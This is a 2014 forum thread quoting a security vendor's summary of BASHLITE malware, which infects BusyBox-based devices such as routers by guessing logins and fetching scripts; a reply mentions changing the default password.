Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

BASHLITE Affects Devices Running on BusyBox


  • Please log in to reply
1 reply to this topic

#1 NickAu

NickAu

    Bleepin' Fish Doctor


  • Moderator
  • 13,728 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1 Australia
  • Local time:11:29 PM

Posted 17 November 2014 - 02:53 PM

 

We have continuously monitored this vulnerability and on our latest research, we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scans the network for devices/machines running on BusyBox, and logs in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the Busybox system.

BusyBox is built on top of the Linux kernel and used by small devices such as routers. Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive. This is seen in the following commands:

BASHLITE Affects Devices Running on BusyBox



BC AdBot (Login to Remove)

 


#2 bmike1

bmike1

  • Members
  • 596 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Gainesville, Florida, USA
  • Local time:08:29 AM

Posted 17 November 2014 - 03:19 PM

thanks for this. I just changed username/password.


A/V Software? I don't need A/V software. I've run Linux since '98 w/o A/V software and have never had a virus. I never even had a firewall until '01 when I began to get routers with firewalls pre installed. With Linux if a vulnerability is detected a fix is quickly found and then upon your next update the vulnerability is patched.  If you must worry about viruses  on a Linux system only worry about them in the sense that you can infect a windows user. I recommend Linux Mint or, if you need a lighter weight operating system that fits on a cd, MX14 or AntiX.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users